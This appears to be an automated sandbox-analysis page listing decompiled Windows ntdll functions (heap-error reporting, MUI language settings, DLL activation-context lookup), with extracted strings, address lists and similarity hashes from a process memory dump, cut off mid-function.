This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0513B47D
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0513B2DC
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0513B53F
write to, xrefs: 0513B4A6
*** An Access Violation occurred in %ws:%s, xrefs: 0513B48F
read from, xrefs: 0513B4AD, 0513B4B2
<unknown>, xrefs: 0513B27E, 0513B2D1, 0513B350, 0513B399, 0513B417, 0513B48E
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0513B38F
*** enter .exr %p for the exception record, xrefs: 0513B4F1
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0513B39B
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0513B484
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0513B305
The resource is owned shared by %d threads, xrefs: 0513B37E
*** Inpage error in %ws:%s, xrefs: 0513B418
*** Resource timeout (%p) in %ws:%s, xrefs: 0513B352
The resource is owned exclusively by thread %p, xrefs: 0513B374
*** enter .cxr %p for the context, xrefs: 0513B50D
a NULL pointer, xrefs: 0513B4E0
an invalid address, %p, xrefs: 0513B4CF
Go determine why that thread has not released the critical section., xrefs: 0513B3C5
This failed because of error %Ix., xrefs: 0513B446
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0513B2F3
The instruction at %p referenced memory at %p., xrefs: 0513B432
The critical section is owned by thread %p., xrefs: 0513B3B9
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0513B476
*** then kb to get the faulting stack, xrefs: 0513B51C
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0513B314
The instruction at %p tried to %s , xrefs: 0513B4B6
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0513B3D6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0513B323

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: f6f6ab9577e64d336d4bf835d1b067f45aee28b824891f0da3577ce7604b43ad
Instruction ID: aba58be0e856697dd0b5b2ca6f4979fe0c829e18a371fa0dcdf2469f522e9b4a
Opcode Fuzzy Hash: f6f6ab9577e64d336d4bf835d1b067f45aee28b824891f0da3577ce7604b43ad
Instruction Fuzzy Hash: 6B812772B08214FFCB26AA04EC9BD7F3B27AF86691F424094F4052F112E3718901DB7A

Uniqueness

Uniqueness Score: -1.00%

Function 05141C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05141C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x50648a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0508B150();
				} else {
					E0508B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x517589c);
				E0508B150("Heap error detected at %p (heap handle %p)\n",  *0x51758a0);
				_t27 =  *0x5175898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05141E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0508B150();
				} else {
					E0508B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0508B150("Error code: %d - %s\n",  *0x5175898);
				_t113 =  *0x51758a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0508B150();
					} else {
						E0508B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0508B150("Parameter1: %p\n",  *0x51758a4);
				}
				_t115 =  *0x51758a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0508B150();
					} else {
						E0508B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0508B150("Parameter2: %p\n",  *0x51758a8);
				}
				_t117 =  *0x51758ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0508B150();
					} else {
						E0508B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0508B150("Parameter3: %p\n",  *0x51758ac);
				}
				_t119 =  *0x51758b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0508B150();
					} else {
						E0508B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x51758b4);
					E0508B150("Last known valid blocks: before - %p, after - %p\n",  *0x51758b0);
				} else {
					_t120 =  *0x51758b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0508B150();
				} else {
					E0508B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0508B150("Stack trace available at %p\n", 0x51758c0);
			}

0x05141c10
0x05141c16
0x05141c1e
0x05141c3d
0x05141c3e
0x05141c20
0x05141c35
0x05141c3a
0x05141c44
0x05141c55
0x05141c5a
0x05141c65
0x05141c67
0x00000000
0x05141c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05141c67
0x05141cdc
0x05141ce5
0x05141d04
0x05141d05
0x05141ce7
0x05141cfc
0x05141d01
0x05141d0b
0x05141d17
0x05141d1f
0x05141d25
0x05141d30
0x05141d4f
0x05141d50
0x05141d32
0x05141d47
0x05141d4c
0x05141d61
0x05141d67
0x05141d68
0x05141d6e
0x05141d79
0x05141d98
0x05141d99
0x05141d7b
0x05141d90
0x05141d95
0x05141daa
0x05141db0
0x05141db1
0x05141db7
0x05141dc2
0x05141de1
0x05141de2
0x05141dc4
0x05141dd9
0x05141dde
0x05141df3
0x05141df9
0x05141dfa
0x05141e00
0x05141e0a
0x05141e13
0x05141e32
0x05141e33
0x05141e15
0x05141e2a
0x05141e2f
0x05141e39
0x05141e4a
0x05141e02
0x05141e02
0x05141e08
0x00000000
0x00000000
0x05141e08
0x05141e5b
0x05141e7a
0x05141e7b
0x05141e5d
0x05141e72
0x05141e77
0x05141e95

Strings

Error code: %d - %s, xrefs: 05141D12
heap_failure_generic, xrefs: 05141C7C
heap_failure_block_not_busy, xrefs: 05141CA6
heap_failure_invalid_allocation_type, xrefs: 05141CB4
HEAP: , xrefs: 05141C16, 05141C3D, 05141D04, 05141D4F, 05141D98, 05141DE1, 05141E32, 05141E7A
Parameter1: %p, xrefs: 05141D5C
heap_failure_virtual_block_corruption, xrefs: 05141C91
heap_failure_entry_corruption, xrefs: 05141C83
heap_failure_listentry_corruption, xrefs: 05141CD0
heap_failure_invalid_argument, xrefs: 05141CAD
Parameter2: %p, xrefs: 05141DA5
heap_failure_buffer_overrun, xrefs: 05141C98
Heap error detected at %p (heap handle %p), xrefs: 05141C50
Stack trace available at %p, xrefs: 05141E86
Last known valid blocks: before - %p, after - %p, xrefs: 05141E45
heap_failure_usage_after_free, xrefs: 05141CBB
heap_failure_buffer_underrun, xrefs: 05141C9F
HEAP[%wZ]: , xrefs: 05141C30, 05141CF7, 05141D42, 05141D8B, 05141DD4, 05141E25, 05141E6D
heap_failure_unknown, xrefs: 05141C75
heap_failure_lfh_bitmap_mismatch, xrefs: 05141CD7
heap_failure_freelists_corruption, xrefs: 05141CC9
heap_failure_cross_heap_operation, xrefs: 05141CC2
heap_failure_internal, xrefs: 05141C6E
heap_failure_multiple_entries_corruption, xrefs: 05141C8A
Parameter3: %p, xrefs: 05141DEE

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: ad0b1da157712bdcea2051f681f7781e68a8d9ab975c26a6c8538f5ccd247c65
Instruction ID: 08ec0e39a686372ac0a0494c45c538f9c3096f390c5d03ae23211b45b77d21dc
Opcode Fuzzy Hash: ad0b1da157712bdcea2051f681f7781e68a8d9ab975c26a6c8538f5ccd247c65
Instruction Fuzzy Hash: 0A61C536AA5548EFD725A759F889D3973BAE704E20B4E806AF40A5F251C730A8C1CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 05093D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E05093D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E05091B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E05091B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E05091B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E05091B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E05091B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L050A4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E050CF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E050D1370(_t276, 0x5064e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E050CBB40(0,  &_v68, _t170);
									if(L050943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E050CBB40(_t257,  &_v68, _t243);
								if(L050943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E050D1370(_t278, 0x5064e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L050A4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E050CF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E050D1370(_v16, 0x5064e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E050CBB40(_t262,  &_v68, _t244);
								if(L050943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E050D1370(_t282, 0x5064e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E050CBB40(_t262,  &_v68, _t201);
							if(L050943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L050A4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E050CF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E050D1370(_t280, 0x5064e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E050CBB40(_t267,  &_v68, _t245);
							if(L050943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E050D1370(_t284, 0x5064e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E050CBB40(_t267,  &_v68, _t224);
						if(L050943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x05093d3c
0x05093d42
0x05093d44
0x05093d46
0x05093d49
0x05093d4c
0x05093d4f
0x05093d52
0x05093d55
0x05093d58
0x05093d5b
0x05093d5f
0x05093d61
0x05093d66
0x050e8213
0x050e8218
0x05094085
0x05094088
0x0509408e
0x05094094
0x0509409a
0x050940a0
0x050940a6
0x050940a9
0x050940af
0x050940b6
0x050940bd
0x050940bd
0x05093d83
0x050e821f
0x050e8229
0x050e8238
0x050e8238
0x050e823d
0x050e823d
0x05093da0
0x05093daf
0x05093db5
0x05093dba
0x05093dba
0x05093dd4
0x05093e94
0x05093eab
0x05093f6d
0x05093f84
0x0509406b
0x0509406b
0x0509406e
0x0509406e
0x05094070
0x05094074
0x050e8351
0x050e8351
0x0509407a
0x0509407f
0x050e835d
0x050e8370
0x050e8377
0x050e8379
0x050e837c
0x050e837c
0x050e835d
0x00000000
0x0509407f
0x05093f8a
0x05093f8d
0x05093f90
0x05093f95
0x050e830d
0x050e830f
0x05093f9b
0x05093fac
0x05093fae
0x05093fb1
0x05093fb1
0x05093fb6
0x050e8317
0x050e831a
0x00000000
0x05093fbc
0x05093fc1
0x05093fc9
0x05093fd7
0x05093fda
0x05093fdd
0x05094021
0x05094021
0x05094029
0x05094030
0x05094044
0x05094046
0x05094046
0x05094044
0x05094049
0x050e8327
0x050e8334
0x050e8339
0x050e833c
0x0509404f
0x0509404f
0x0509404f
0x05094051
0x05094056
0x05094063
0x05094063
0x05094068
0x00000000
0x05094068
0x05093fdf
0x05093fe2
0x05093fe4
0x05093fe7
0x05093fef
0x05094003
0x05094005
0x05094005
0x0509400c
0x05094013
0x05094016
0x05094017
0x0509401b
0x0509401e
0x00000000
0x0509401e
0x05093fb6
0x05093eb1
0x05093eb4
0x05093eb7
0x05093ebc
0x050e82a9
0x050e82ab
0x05093ec2
0x05093ed3
0x05093ed5
0x05093ed8
0x05093ed8
0x05093edd
0x050e82b3
0x050e82b6
0x00000000
0x05093ee3
0x05093ee8
0x05093eed
0x05093ef0
0x05093ef3
0x05093f02
0x05093f05
0x05093f08
0x050e82c0
0x050e82c3
0x050e82c5
0x050e82c8
0x050e82d0
0x050e82e4
0x050e82e6
0x050e82e6
0x050e82ed
0x050e82f4
0x050e82f7
0x050e82f8
0x050e82fc
0x050e82ff
0x050e82ff
0x05093f0e
0x05093f11
0x05093f16
0x05093f1d
0x05093f31
0x050e8307
0x050e8307
0x05093f31
0x05093f39
0x05093f48
0x05093f4d
0x05093f50
0x05093f50
0x05093f53
0x05093f58
0x05093f65
0x05093f65
0x05093f6a
0x00000000
0x05093f6a
0x05093edd
0x05093dda
0x05093ddd
0x05093de0
0x05093de5
0x050e8245
0x05093deb
0x05093df7
0x05093dfc
0x05093dfe
0x05093e01
0x05093e01
0x05093e06
0x050e824d
0x050e824f
0x050e8254
0x00000000
0x05093e0c
0x05093e11
0x05093e16
0x05093e19
0x05093e29
0x05093e2c
0x05093e2f
0x050e825c
0x050e825f
0x050e8261
0x050e8264
0x050e826c
0x050e8280
0x050e8282
0x050e8282
0x050e8289
0x050e8290
0x050e8293
0x050e8294
0x050e8298
0x050e829b
0x050e829b
0x05093e35
0x05093e38
0x05093e3d
0x05093e44
0x05093e58
0x050e82a3
0x050e82a3
0x05093e58
0x05093e60
0x05093e6f
0x05093e74
0x05093e77
0x05093e77
0x05093e7a
0x05093e7f
0x05093e8c
0x05093e8c
0x05093e91
0x00000000
0x05093e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 05093E97
Kernel-MUI-Language-SKU, xrefs: 05093F70
Kernel-MUI-Number-Allowed, xrefs: 05093D8C
WindowsExcludedProcs, xrefs: 05093D6F
Kernel-MUI-Language-Allowed, xrefs: 05093DC0

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7553c678f5eb10d5736fe034a36560a855b63d1b923b35a8c3fb555842730611
Instruction ID: 49220830027f994163555d27c822dc2c4149ecc118adeebe1ba65aaf7aa640b7
Opcode Fuzzy Hash: 7553c678f5eb10d5736fe034a36560a855b63d1b923b35a8c3fb555842730611
Instruction Fuzzy Hash: DDF14B72E00619EFCF15DF98E984AEEBBF9FF48650F14405AE905A7250E7709E01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050B8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E050B8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x517d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x5178464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x5175780 & 0x00000003) != 0) {
							E05105510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x5175780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E050CB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x5177984; // 0x3362ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x5178464; // 0x74b10110
					 *0x517b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E050B9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x5175780 & 0x00000005) != 0) {
						_push(_t49);
						E05105510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x050b8e0f
0x050b8e16
0x050b8e19
0x050b8e1b
0x050b8e21
0x050b8e7f
0x050b8e85
0x050f9354
0x050f936c
0x050f9371
0x050f937b
0x050f9381
0x050f9381
0x050f937b
0x050b8e9d
0x050b8e9d
0x050b8e29
0x050b8e2c
0x050b8e38
0x050b8e3e
0x050b8e43
0x050b8eb5
0x050b8eb9
0x050f92aa
0x050f92af
0x050f92e8
0x050f92e8
0x050f92af
0x050b8eb9
0x050b8e45
0x050b8e53
0x050b8e5b
0x050b8e5f
0x050b8e78
0x050b8e78
0x050b8e7d
0x050b8ec3
0x050b8ecd
0x050b8ed2
0x050b8ed2
0x050b8ec5
0x050b8ec5
0x00000000
0x050b8e7d
0x050b8e67
0x050b8ea4
0x050f931a
0x00000000
0x00000000
0x050f9320
0x050b8ea4
0x050b8e70
0x050f9325
0x050f9340
0x050f9345
0x050f9345
0x050b8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 050F932A
LdrpFindDllActivationContext, xrefs: 050F9331, 050F935D
minkernel\ntdll\ldrsnap.c, xrefs: 050F933B, 050F9367
Querying the active activation context failed with status 0x%08lx, xrefs: 050F9357

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: f66da3016587216595555092594bcfbca8fbb44a8b52e6406ed09e0fe493757f
Instruction ID: 2a66b6974e2491e73e21698164c93db2f67b5b1aed697ca0ef0190581131b959
Opcode Fuzzy Hash: f66da3016587216595555092594bcfbca8fbb44a8b52e6406ed09e0fe493757f
Instruction Fuzzy Hash: D841E931A043159EFB65AE18B8C9EBD76FEBF00644F09C565E525571A0E7F29C808681

Uniqueness

Uniqueness Score: -1.00%

Function 05098794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E05098794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
